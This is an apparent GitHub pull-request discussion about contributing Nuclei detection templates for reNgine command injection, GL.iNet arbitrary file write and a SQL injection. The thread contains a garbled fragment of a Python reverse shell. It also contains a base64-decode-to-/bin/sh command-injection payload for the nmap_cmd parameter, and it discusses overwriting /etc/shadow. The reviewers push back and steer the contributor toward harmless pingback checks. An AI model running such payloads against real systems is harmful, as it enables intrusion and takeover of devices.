Added template for CVE-2023-46455, CVE-2023-50094

[Zierax]

Template / PR Information

This template checks for a command injection vulnerability in reNgine v2.2.0, where an authenticated user can manipulate parameters in the scan engine configuration to execute arbitrary system commands.

• Added CVE: None available currently (Exploit Title: "reNgine 2.2.0 - Command Injection (Authenticated)")
• References:
  • reNgine Wiki
  • GitHub Repository

Template Validation

I've validated this template locally?

• NO

Additional Details

• Google Query: intitle:"reNgine"
• Vulnerable parameters: nmap_cmd

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

---

Template / PR Information

This template tests for SQL injection vulnerabilities in the Customer Support System v1.0, allowing an authenticated user to execute arbitrary SQL commands by injecting malicious payloads into specific parameters.

• Added CVE: CVE-2023-50071
• References:
  • Vendor Source Code

Template Validation

I've validated this template locally?

• YES

Additional Details

• Google Query: inurl:"customer_support/index.php"
• Affected Parameters: department_id, customer_id, subject
• Request Payload: POST /customer_support/ajax.php?action=save_ticket

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

---

Template / PR Information

This template checks for an arbitrary file write vulnerability in GL.iNet devices (<= 4.3.7). An attacker can overwrite system files, including the shadow file, allowing modification of root access credentials.

• Added CVE: CVE-2023-46455
• References:
  • Vendor Homepage

Template Validation

I've validated this template locally?

• YES

Additional Details

• Google Query: intitle:"GL.iNet Admin Panel"
• Affected Version: GL.iNet devices with firmware <= 4.3.7
• Exploit URL: /upload
• File Path Traversal to /etc/shadow

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[yoerivegt]

Is this invalid base64?

[Zierax]

no this is a valid base 64 and this is the original code
python3 -c 'import socket,os,pty;s=socket.socket(socet.A_INET,s.connect("#��#CB�S�c"c�c�"2GW�"2fV�2GW�"2fV�2GW�"2fV"�G7��v"&6"r

[yoerivegt]

What does it do? It's not valid python, and I don't see why you'd want to connect to a socket? It seems awfully like a reverse shell. Am I missing something? 😓

[dwisiswant0]

Getting a pingback to the interactsh-url is enough.

[Zierax]

okay here is the update for ping interactsh-url only
but what is the variable should I add in the encoded code for ping interactsh-url ?

[Zierax]

should I push now

path:
  - "{{BaseURL}}/scan-engine/update"  # Adjust the endpoint for modifying scan engines
body: |
  nmap_cmd: 'echo "cGluZyAiJHt7aW50ZXJhY3RzaC11cmx9fSI=" | base64 --decode | /bin/sh'  # Sends ping to {{interactsh-url}} 

decoded version
path:

• "{{BaseURL}}/scan-engine/update" # Adjust the endpoint for modifying scan engines
  body: |
  nmap_cmd: 'echo "ping "${{interactsh-url}}"" | base64 --decode | /bin/sh' # Sends ping to {{interactsh-url}}

[Zierax]

hi ??

[Zierax]

#######EDIT_TO_MAKE_THE_TEMPLATE_PING_INTERACTSH#######

path:

• "{{BaseURL}}/scan-engine/update" # Adjust the endpoint for modifying scan engines
  body: |
  nmap_cmd: 'echo "cGluZyAiJHt7aW50ZXJhY3RzaC11cmx9fSI=" | base64 --decode | /bin/sh' # Sends ping to {{interactsh-url}}

#######EDIT_TO_MAKE_THE_TEMPLATE_PING_INTERACTSH#######

[mastercho]

Interesting, never saw reNgine had vuln before, about GL.iNet don't you think this payload is dangerous to run on prod?

[Zierax]

This CVE was first exposed on 2024-09-29, so it's understandable if this is the first time you've heard about this vulnerability.

Reference

• Exploit Database Entry

I haven’t publicly disclosed the vulnerability details yet. However, since there were no existing Nuclei templates for this vulnerability, I created one myself.

I'm also planning to compile a comprehensive list of unknown vulnerabilities and publish it.

[Zierax]

I am waiting for the accept :)

[Zierax]

first time to know those has CVEs
can you rename the templates?

[ritikchaddha]

Hi @Zierax, I've removed the customer-support-system-sql-injection template. At this time, we are not accepting/adding templates for those that are less widely used php projects. Thank you for your understanding!

[ritikchaddha]

It is crucial to avoid overwriting sensitive files like /etc/shadow or /etc/passwdin template gl-inet-arbitrary-file-write. Instead, please consider updating the template or add another file.

Additionally, don’t forget to update both templates with the POC reference and CVE id for clarity.

[Zierax]

Done;

[ritikchaddha]

Hi @Zierax,

Both templates appear to be authenticated. To help validate the matchers, could you please share the debug data for the templates of CVE-2023-46455 and CVE-2023-50094?

Additionally, in the rengine-command-injection template, the last request for the exploit you've added differs from the request in the POC reference. Specifically, it is using /api/scanengine/{scan_engine_id}/, whereas it should be an /api/ endpoint with a valid scan_engine_id.

Thank you!

[Zierax]

I cant now using the tamplates against vulnerable services "it's illegal", so if you can provide the vulnerable services for scan it by the templates I would use them then provide the debuging data